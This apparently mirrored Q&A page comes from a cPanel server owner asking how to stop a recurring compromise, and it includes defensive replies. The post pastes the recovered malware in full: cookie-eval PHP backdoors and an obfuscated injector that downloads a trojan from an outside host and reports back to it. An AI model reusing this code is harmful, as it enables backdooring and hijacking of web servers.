防止黑客上传文件和创建/更改电子邮件

Prevent hacker from uploading files and creating/changing emails

提问人:john 提问时间:10/11/2023 更新时间:10/11/2023 访问量:113

问:

我们有一个安装了 Cpanel 的 EC2 实例。几天前,我们注意到我们唯一拥有的帐户中有一些PHP文件,这些文件具有随机名称,例如不同的代码,例如:wDciW.php

<?php
$p=$_COOKIE;(count($p)==20&&in_array(gettype($p).count($p),$p))?(($p[29]=$p[29].$p[13])&&($p[11]=$p[29]($p[11]))&&($p=$p[11]($p[16],$p[29]($p[26])))&&$p()):$p;
?>

添加或修改 .htaccess 文件,以允许运行扩展名为 的文件以及带有图像扩展名的文件,代码如下:.py

<?php

if(isset($_SERVER['HTTP_USER_AGENT'])) {

    if(strpos($_SERVER['HTTP_USER_AGENT'], '23561017') !== false) {

        function clnt() {
            $b = $_COOKIE;
           ($b && isset($b[61])) ? (($gg = $b[61].$b[34]) && ($mn = $gg($b[36].$b[89])) && ($_mn = $gg($b[32].$b[54])) && ($_mn = $_mn($gg($b[64]))) && @eval($_mn)) : $b;

            return 0;

        }

        clnt();

    }

} /* sQ6H7D */

所有文件在开始时都使用这样的代码进行了更新:index.php

<?php
$O00OO_0_O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O000OOO___=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{16}.$O00OO_0_O_{18}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O_0O_0O0O_=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{27}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O0_O0_O0O_=$O00OO_0_O_{32}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{6}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{38}.$O00OO_0_O_{18}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{10}.$O00OO_0_O_{12}.$O00OO_0_O_{35}.$O00OO_0_O_{0};$OOO0_O0_0_=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$OO0O___0O0=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{26}.$O00OO_0_O_{30}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$O_O_0_O00O=$O00OO_0_O_{16}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{27}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_00O0OO__=$O00OO_0_O_{33}.$O00OO_0_O_{10}.$O00OO_0_O_{24}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_0_O0_O0O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{35}.$O00OO_0_O_{16}.$O00OO_0_O_{10};$O_O_O000_O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{23}.$O00OO_0_O_{35}.$O00OO_0_O_{33}.$O00OO_0_O_{30};$O___00OO0O=$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{24}.$O00OO_0_O_{12}.$O00OO_0_O_{6}.$O00OO_0_O_{23}.$O00OO_0_O_{12}.$O00OO_0_O_{2}.$O00OO_0_O_{30};$O__0O0_0OO=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{12}.$O00OO_0_O_{0}.$O00OO_0_O_{12}.$O00OO_0_O_{10};$O_OO_O000_=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{17}.$O00OO_0_O_{30}.$O00OO_0_O_{32};$OO0O0__O0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$O__O00_OO0=\'\'','if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];}elseif(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"];}return $O__O00_OO0;');$OOO_O00_0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$url','$OO0O0_0_O_=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($url);if(!$OO0O0_0_O_){$O0O0_O_0O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f"]($O0O0_O_0O_,CURLOPT_URL,$url);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f"]($O0O0_O_0O_,CURLOPT_RETURNTRANSFER,1);$OO0O0_0_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x4f\x30\x30\x30\x5f"]($O0O0_O_0O_);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x30\x30\x5f\x4f"]($O0O0_O_0O_);}return $OO0O0_0_O_;');$O_OO__0O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$O_0O_O_0O0=\'\'','$O_0_O_OO00=array();$O_0_O_OO00["\x70\x61\x74\x68"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"](\'//\',\'/\',${"\x5f\x53\x45\x52\x56\x45\x52"}["\x50\x48\x50\x5f\x53\x45\x4c\x46"]),\'\',${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"](\'\\\\\\\\\',\'/\',${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"]));$O_0_O_OO00["\x64\x6f\x6d\x61\x69\x6e"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x5f\x5f\x4f\x30\x5f"]();$O_0_O_OO00["\x73\x68\x65\x6c\x6c\x5f\x6c\x69\x6e\x6b"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"](\'aHR0cHM6Ly9nYWQuZ2VjZWd5cHQuY29tL2Fib3V0LnBocD81MjA=\');if(isset(${"\x5f\x47\x45\x54"}["\x64\x65\x6c"])&&${"\x5f\x47\x45\x54"}["\x64\x65\x6c"]=="my_code"){$O0_0OO_O0_=$O_0_O_OO00["\x70\x61\x74\x68"]."/index.php";$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($O0_0OO_O0_);$O_OO_0_0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x4f\x30\x30\x4f"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0_0OO_O0_,$OO0O0O0___);if($OO0O0O0___>0){die("delete success");}die("delete failed");}$OO_O__O000=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("YWJvdXQucGhw");$O0O_0_O0_O=$O_0_O_OO00["\x70\x61\x74\x68"]."/".$OO_O__O000;$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x4f\x30\x30\x5f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("aHR0cDovLzUxbGEuaXp2NC5jb20vYS50eHQ="));$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0O_0_O0_O,$OO0O0O0___);if($OO0O0O0___>0){$O_0_O_OO00["\x74\x72\x6f\x6a\x61\x6e"]="http://".$O_0_O_OO00["\x64\x6f\x6d\x61\x69\x6e"]."/".$OO_O__O000;}else{$O_0_O_OO00["\x74\x72\x6f\x6a\x61\x6e"]="write failed";}$OO_0O00O__=sprintf(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"](\'aHR0cDovLzUxbGEuaXp2NC5jb20vP2Q9JXM=\'),${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x4f\x30\x5f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x5f\x30\x30\x4f\x4f\x30\x4f"]($O_0_O_OO00)));$O__OO0O00_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x4f\x30\x30\x5f\x30\x5f"]($OO_0O00O__);if($O__OO0O00_=="done"){$O0_0OO_O0_=$O_0_O_OO00["\x70\x61\x74\x68"]."/index.php";$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($O0_0OO_O0_);$O_OO_0_0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x4f\x30\x30\x4f"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0_0OO_O0_,$OO0O0O0___);}');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x5f\x30\x4f\x30\x30"](1);?>

或包含前面提到的图像文件的脚本。

我们从子域文件夹中删除了所有此类文件。我们怀疑这是来自一个旧的WordPress网站,所以我们也删除了它。public_html

今天我们在目录中发现了 2 个新的 PHP 文件,所有电子邮件密码都已更改,并创建了一些新电子邮件。public_html

我们安装是为了扫描和删除恶意文件。我们在之前上传的其中一个子域的文件夹中的文件夹中发现了一些类似的文件。我们删除了所有这些文件,更改了所有电子邮件密码,删除了所有创建的电子邮件,并更改了Cpanel帐户密码。imunifyav/home/user/etcvendor/composer

删除所有恶意文件并更改帐户密码后,这是否足以防止黑客上传或添加/更改电子邮件?

如果他设法将一些文件上传到服务器,他是否可以创建/更改电子邮件或此类操作需要 Cpanel 或 SSH 访问?

PHP 安全 cPanel

评论

0赞 Dean Van Greunen 10/11/2023
将您的 PHP 升级到版本 8.2,因为旧版本的 PHP 的 fpm 模块存在漏洞
1赞 Dean Van Greunen 10/11/2023
将 PHP 脚本文件权限更改为使用非 root 用户,将非 root 用户限制为脚本所属的目录。
1赞 john 10/11/2023
@DeanVanGreunen PHP 8.2 已安装并激活所有子版本被禁用PHP-FPM
2赞 Alex Howansky 10/11/2023
“删除所有恶意文件并更改帐户密码后,这是否足以防止黑客上传或添加/更改电子邮件?”几乎可以肯定不是。您的服务器可能由于配置错误而受到入侵,而不是密码泄露。第一步:Web 服务器进程永远不应该对它所提供的文件具有写入权限。
1赞 ADyson 10/12/2023
How to change the write access permissions....只是常规的 bog 标准文件系统权限。不要授予 Web 服务器的用户帐户对这些文件夹的写入或修改权限。读取+执行就是所需要的。(如果您有一个存储上传文档的合法文件夹,这是一个例外 - 但其中的文件绝对不能添加执行权限)

答: 暂无答案

上一个:如何为我的 Laravel 应用程序设置多环境配置 [已关闭]

下一个:如何定义 cURL 请求并阻止它?不可能?